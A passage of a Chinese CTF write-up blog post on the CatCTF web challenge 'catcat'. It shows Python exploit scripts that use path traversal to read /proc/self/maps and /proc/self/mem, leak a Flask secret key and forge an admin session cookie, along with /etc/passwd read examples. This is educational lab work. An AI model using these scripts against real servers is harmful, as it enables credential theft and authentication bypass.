class="line"> <span class="keyword">if</span> filename != <span class="string">&quot;&quot;</span> <span class="keyword">and</span> os.access(filename, os.R_OK):</span><br><span class="line"> f = <span class="built_in">open</span>(filename, <span class="string">&quot;rb&quot;</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> start &gt;= <span class="number">0</span>:</span><br><span class="line"> f.seek(start)</span><br><span class="line"> <span class="keyword">if</span> end &gt;= start <span class="keyword">and</span> end != <span class="number">0</span>:</span><br><span class="line"> data = f.read(end-start)</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data = f.read()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data = f.read()</span><br><span class="line"> </span><br><span class="line"> f.close()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data = (<span class="string">&quot;File `%s` not exist or can not be read&quot;</span> % filename).encode()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> data</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line"> opts,args = getopt.getopt(sys.argv[<span class="number">1</span>:],<span class="string">&#x27;-h-f:-s:-e:&#x27;</span>,[<span class="string">&#x27;help&#x27;</span>,<span class="string">&#x27;file=&#x27;</span>,<span class="string">&#x27;start=&#x27;</span>,<span class="string">&#x27;end=&#x27;</span>])</span><br><span class="line"> fileName = <span class="string">&quot;&quot;</span></span><br><span class="line"> start = <span class="number">0</span></span><br><span class="line"> end = <span class="number">0</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">for</span> opt_name, opt_value <span class="keyword">in</span> opts:</span><br><span class="line"> <span class="keyword">if</span> opt_name == <span class="string">&#x27;-h&#x27;</span> <span class="keyword">or</span> opt_name == <span class="string">&#x27;--help&#x27;</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;[*] Help&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;-f --file File name&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;-s --start Start position&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;-e --end End position&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;[*] Example of reading /etc/passwd&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;python3 cat.py -f /etc/passwd&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;python3 cat.py --file /etc/passwd&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;python3 cat.py -f /etc/passwd -s 1&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;python3 cat.py -f /etc/passwd -e 5&quot;</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;python3 cat.py -f /etc/passwd -s 1 -e 5&quot;</span>)</span><br><span class="line"> exit()</span><br><span class="line"></span><br><span class="line"> <span class="keyword">elif</span> opt_name == <span class="string">&#x27;-f&#x27;</span> <span class="keyword">or</span> opt_name == <span class="string">&#x27;--file&#x27;</span>:</span><br><span class="line"> fileName = opt_value</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">elif</span> opt_name == <span class="string">&#x27;-s&#x27;</span> <span class="keyword">or</span> opt_name == <span class="string">&#x27;--start&#x27;</span>:</span><br><span class="line"> start = opt_value</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">elif</span> opt_name == <span class="string">&#x27;-e&#x27;</span> <span class="keyword">or</span> opt_name == <span class="string">&#x27;--end&#x27;</span>:</span><br><span class="line"> end = opt_value</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> fileName != <span class="string">&quot;&quot;</span>:</span><br><span class="line"> <span class="built_in">print</span>(cat(fileName, start, end)) </span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">&quot;No file to read&quot;</span>)</span><br></pre></td></tr></table></figure>



<p>可以得到cat函数的定义：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">cat</span>(<span class="params">filename, start=<span class="number">0</span>, end=<span class="number">0</span></span>)-&gt;<span class="built_in">bytes</span>:</span><br><span class="line"> data = <span class="string">b&#x27;&#x27;</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> start = <span class="built_in">int</span>(start)</span><br><span class="line"> end = <span class="built_in">int</span>(end)</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> start=<span class="number">0</span></span><br><span class="line"> end=<span class="number">0</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> filename != <span class="string">&quot;&quot;</span> <span class="keyword">and</span> os.access(filename, os.R_OK):</span><br><span class="line"> f = <span class="built_in">open</span>(filename, <span class="string">&quot;rb&quot;</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> start &gt;= <span class="number">0</span>:</span><br><span class="line"> f.seek(start)</span><br><span class="line"> <span class="keyword">if</span> end &gt;= start <span class="keyword">and</span> end != <span class="number">0</span>:</span><br><span class="line"> data = f.read(end-start)</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data = f.read()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data = f.read()</span><br><span class="line"> </span><br><span class="line"> f.close()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data = (<span class="string">&quot;File `%s` not exist or can not be read&quot;</span> % filename).encode()</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> data</span><br></pre></td></tr></table></figure>

<p>作用是读取文件并以bytes返回，观察可知可以设定读取位置（start、end）</p>
<p>结合app.py中：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/info&#x27;</span>, methods=[<span class="string">&quot;GET&quot;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">info</span>():</span><br><span class="line"> filename = <span class="string">&quot;./details/&quot;</span> + request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>)</span><br><span class="line"> start = request.args.get(<span class="string">&#x27;start&#x27;</span>, <span class="string">&quot;0&quot;</span>)</span><br><span class="line"> end = request.args.get(<span class="string">&#x27;end&#x27;</span>, <span class="string">&quot;0&quot;</span>)</span><br><span class="line"> name = request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>)[:request.args.get(<span class="string">&#x27;file&#x27;</span>, <span class="string">&quot;&quot;</span>).index(<span class="string">&#x27;.&#x27;</span>)]</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">&quot;detail.html&quot;</span>, catname=name, info=cat(filename, start, end))</span><br></pre></td></tr></table></figure>



<p>我们可以知道可以传start和end参数来截取返回的部分内容，比如：</p>
<p><img src="/static/CatCTF/se.png"></p>
<p>这又有什么用呢？不急，马上就有大用了。</p>
<p>这题的关键点就是伪造session，从而访问admin路由获取flag</p>
<p>但伪造session需要获取secret key</p>
<h4 id=""><a href="#" class="headerlink" title=""></a></h4><p>这里可以利用python存储对象的位置在堆上这个特性，</p>
<p>app是实例化的Flask对象，而secret key在<code>app.config[&#39;SECRET_KEY&#39;]</code>，</p>
<p>所以可以通过读取/proc/self/mem来读取secret key</p>
<p>其实flag也在内存里，也可以正则匹配直接读取到flag。</p>
<p>但是/proc/self/mem内容较多而且存在不可不可读写部分，无法直接访问到</p>
<p>所以先读取/proc/self/maps获取堆栈分布，用脚本找到可读写部分，再去利用start与end参数访问出来，正则匹配secret_key。</p>
<p>从app.py中可以得到secret_key的格式：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.config[<span class="string">&#x27;SECRET_KEY&#x27;</span>] = <span class="built_in">str</span>(uuid.uuid4()).replace(<span class="string">&quot;-&quot;</span>, <span class="string">&quot;&quot;</span>) + <span class="string">&quot;*abcdefgh&quot;</span></span><br></pre></td></tr></table></figure>



<p>参照了官方脚本和B站上大佬的脚本，我写了一个自己的脚本</p>
<p>main.py:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://61.147.171.105:61020/&quot;</span></span><br><span class="line">bypass = <span class="string">&quot;../..&quot;</span></span><br><span class="line">map_list = requests.get(url + <span class="string">f&quot;info?file=<span class="subst">&#123;bypass&#125;</span>/proc/self/maps&quot;</span>)</span><br><span class="line">map_list = map_list.text.split(<span class="string">&quot;\\n&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> map_list:</span><br><span class="line">    map_addr = re.<span class="keyword">match</span>(<span class="string">r&quot;([a-z0-9]+)-([a-z0-9]+) rw&quot;</span>, i)</span><br><span class="line">    <span class="keyword">if</span> map_addr != <span class="literal">None</span>:</span><br><span class="line">        start = <span class="built_in">int</span>(map_addr.group(<span class="number">1</span>), <span class="number">16</span>)</span><br><span class="line">        end = <span class="built_in">int</span>(map_addr.group(<span class="number">2</span>), <span class="number">16</span>)</span><br><span class="line">        mem = requests.get(url + <span class="string">f&quot;info?file=<span class="subst">&#123;bypass&#125;</span>/proc/self/mem&amp;start=<span class="subst">&#123;start&#125;</span>&amp;end=<span class="subst">&#123;end&#125;</span>&quot;</span>)</span><br><span class="line">        flag = re.findall(<span class="string">&quot;[a-zA-Z]&#123;6&#125;\&#123;[a-z0-9A-Z-_]*\&#125;&quot;</span>, mem.text)</span><br><span class="line">        <span class="keyword">if</span> flag:</span><br><span class="line">            <span class="built_in">print</span>(flag[<span class="number">0</span>])</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;*abcdefgh&quot;</span> <span class="keyword">in</span> mem.text:</span><br><span class="line">            secretkey = re.findall(<span class="string">&quot;[a-z0-9]&#123;32&#125;\*abcdefgh&quot;</span>,mem.text)</span><br><span class="line">            <span class="keyword">if</span> secretkey:</span><br><span class="line">                <span class="built_in">print</span>(secretkey[<span class="number">0</span>])</span><br></pre></td></tr></table></figure>



<p>可以得到flag和secretkey</p>
<p><img src="/static/CatCTF/output.png"></p>
<p>其实已经得到<strong>flag:catctf{Catch_the_c4t_HaHa}</strong></p>
<p>但是还是可以尝试session伪造一下：</p>
<p>由app.py，访问/admin时session里的admin为1时返回flag。</p>
<p>官网是给出了一个github项目：</p>
<p>session伪造可以利用如下<a target="_blank" rel="noopener" href="https://github.com/noraj/flask-session-cookie-manager">项目</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/noraj/flask-session-cookie-manager</span><br></pre></td></tr></table></figure>



<p>用这个伪造就行了</p>
<p>最后官方的脚本是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="comment">#----------------------------------</span></span><br><span class="line"><span class="comment">###################################</span></span><br><span class="line"><span class="comment">#Edited by lx56@blog.lxscloud.top</span></span><br><span class="line"><span class="comment">###################################</span></span><br><span class="line"><span class="comment">#----------------------------------</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> ast, sys</span><br><span class="line"><span class="keyword">from</span> abc <span class="keyword">import</span> ABC</span><br><span class="line"><span class="keyword">from</span> flask.sessions <span class="keyword">import</span> SecureCookieSessionInterface</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#此程序只能运行于Python3以上</span></span><br><span class="line"><span class="keyword">if</span> sys.version_info[<span class="number">0</span>] &lt; <span class="number">3</span>: <span class="comment"># &lt; 3.0</span></span><br><span class="line">    <span class="keyword">raise</span> Exception(<span class="string">&#x27;Must be using at least Python 3&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#----------------session 伪造----------------</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MockApp</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, secret_key</span>):</span><br><span class="line">        self.secret_key = secret_key</span><br><span class="line">        </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">FSCM</span>(<span class="title class_ inherited__">ABC</span>):</span><br><span class="line">        <span class="keyword">def</span> <span class="title function_">encode</span>(<span class="params">secret_key, session_cookie_structure</span>):</span><br><span class="line">            <span class="string">&quot;&quot;&quot; Encode a Flask session cookie &quot;&quot;&quot;</span></span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                app = MockApp(secret_key)</span><br><span class="line"></span><br><span class="line">                session_cookie_structure = <span class="built_in">dict</span>(ast.literal_eval(session_cookie_structure))</span><br><span class="line">                si = SecureCookieSessionInterface()</span><br><span class="line">                s = si.get_signing_serializer(app)</span><br><span class="line"></span><br><span class="line">                <span class="keyword">return</span> s.dumps(session_cookie_structure)</span><br><span class="line">            <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">                <span class="keyword">return</span> <span class="string">&quot;[Encoding error] &#123;&#125;&quot;</span>.<span class="built_in">format</span>(e)</span><br><span class="line">                <span class="keyword">raise</span> e</span><br><span class="line"><span class="comment">#-------------------------------------------</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#由/proc/self/maps获取可读写的内存地址，再根据这些地址读取/proc/self/mem来获取secret key</span></span><br><span class="line">s_key = <span class="string">&quot;&quot;</span></span><br><span class="line">bypass = <span class="string">&quot;../..&quot;</span></span><br><span class="line"><span class="comment">#请求file路由进行读取</span></span><br><span class="line">map_list = requests.get(url + <span class="string">f&quot;info?file=<span class="subst">&#123;bypass&#125;</span>/proc/self/maps&quot;</span>)</span><br><span class="line">map_list = map_list.text.split(<span class="string">&quot;\\n&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> map_list:</span><br><span class="line">    <span class="comment">#匹配指定格式的地址</span></span><br><span class="line">    map_addr = re.<span class="keyword">match</span>(<span class="string">r&quot;([a-z0-9]+)-([a-z0-9]+) rw&quot;</span>, i)</span><br><span class="line">    <span class="keyword">if</span> map_addr:</span><br><span class="line">        start = <span class="built_in">int</span>(map_addr.group(<span class="number">1</span>), <span class="number">16</span>)</span><br><span class="line">        end = <span class="built_in">int</span>(map_addr.group(<span class="number">2</span>), <span class="number">16</span>)</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;Found rw addr:&quot;</span>, start, <span class="string">&quot;-&quot;</span>, end)</span><br><span class="line">        </span><br><span class="line">        <span class="comment">#设置起始和结束位置并读取/proc/self/mem</span></span><br><span class="line">        res = requests.get(<span class="string">f&quot;<span class="subst">&#123;url&#125;</span>/info?file=<span class="subst">&#123;bypass&#125;</span>/proc/self/mem&amp;start=<span class="subst">&#123;start&#125;</span>&amp;end=<span class="subst">&#123;end&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="comment">#如果发现*abcdefgh存在其中，说明成功泄露secretkey</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;*abcdefgh&quot;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="comment">#正则匹配，本题secret key格式为32个小写字母或数字，再加上*abcdefgh</span></span><br><span class="line">            secret_key = re.findall(<span class="string">&quot;[a-z0-9]&#123;32&#125;\*abcdefgh&quot;</span>, res.text)</span><br><span class="line">            <span class="keyword">if</span> secret_key:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;Secret Key:&quot;</span>, secret_key[<span class="number">0</span>])</span><br><span class="line">                s_key = secret_key[<span class="number">0</span>]</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#设置session中admin的值为1</span></span><br><span class="line">data = <span class="string">&#x27;&#123;&quot;admin&quot;:1&#125;&#x27;</span></span><br><span class="line"><span class="comment">#伪造session</span></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&quot;Cookie&quot;</span> : <span class="string">&quot;session=&quot;</span> + FSCM.encode(s_key, data)</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">#请求admin路由</span></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    flag = requests.get(url + <span class="string">&quot;admin&quot;</span>, headers=headers)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Flag is&quot;</span>, flag.text)</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Something error&quot;</span>)</span><br></pre></td></tr></table></figure>



<p>这里session伪造其实还不是很清楚，如何知道什么加密呢，还是只能用项目，用jwt库能否实现伪造。</p>
<p>但flag总归是出了：<strong>flag:catctf{Catch_the_c4t_HaHa}</strong></p>
</div>
        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5 itemprop="copyrightNotice">本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "https://rippleqaq.github.io/2023/01/04/CatCTF/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "https://rippleqaq.github.io/2023/01/04/CatCTF/";
            const title         = "「CatCTF」";
            const excerpt       = `一个为猫猫打猫粮的公益CTF，记录一下收获。
现题目已在攻防世界上线：
CatCTF原题
官网WP
一、Misc1.CatchCat第一次做GPS题，上网查了资料写脚本做出来了，很有成就感。
附件是GPS数据文件CatchCat.tx...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    
                </div>
                <div class="pull-date">
                    <time datetime="2023-08-02T05:10:15.753Z" itemprop="dateModified">最后编辑：2023-08-02</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" 向博客中上传图片" href="/2022/12/15/upload_img_on_blog/">&lt; 上一篇</a>
            </div>
            
            
            <div class="nav-next clearfix">
                <a title=" flask中debug、host、port的配置方法(pycharm社区版)" href="/2023/01/05/flask_configure/">下一篇 &gt;</a>
            </div>
            
        </nav>
    
    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/static/1.jpg" loading="lazy" decoding="auto" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center"></p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                17
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                5
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                0
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                    <aside id="krw-toc" class="widget widget-kratos-toc clearfix toc-div-class" >
    <div class="photo-background"></div>
    <h4 class="widget-title no-after">
        <i class="fa fa-compass"></i>
        文章目录
        <span class="toc-progress-bar" role="progressbar" aria-label="阅读进度："></span>
    </h4>
    <div class="textwidget">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81Misc"><span class="toc-text">一、Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-CatchCat"><span class="toc-text">1.CatchCat</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Miao"><span class="toc-text">2.Miao</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-catcat"><span class="toc-text">3.catcat</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81Web"><span class="toc-text">二、Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-catcat"><span class="toc-text">1.catcat</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E9%83%A8%E5%88%86"><span class="toc-text">文件读取部分</span></a></li><li class="toc-item toc-level-4"><a class="toc-link"><span class="toc-text"></span></a></li></ol></li></ol></li></ol>
    </div>
</aside>
                
                
  <aside id="krw-categories" class="widget widget-kratos-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><span class="category-list-count">7</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/match/">match</a><span class="category-list-count">7</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/blog/">blog</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/flask/">flask</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a><span class="category-list-count">2</span></li></ul>
  </aside>


            
                
            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2023/10/19/NewStar2023-Week3-Web/"><i class="fa  fa-book"></i> NewStar2023 Week3 web writeup by ripple</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/09/21/blog_demain_deploy/"><i class="fa  fa-book"></i> 为博客设置个人域名</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/04/04/flask_variable/"><i class="fa  fa-book"></i> flask路由与视图映射与传参规则</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/03/11/HGAME-Final/"><i class="fa  fa-book"></i> HGAME 2022 FINAL writeup by ripple</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/03/09/build_environment/"><i class="fa  fa-book"></i> linux内基本环境搭建</a>
            
          
        
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        
                        
                        
                        
                        <li><a target="_blank" rel="me" href="https:///@rippleQAQ"><i class="fa fa fa-share-alt-square"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://github.com/rippleQAQ"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2023 ripple 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by rippleQAQ.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
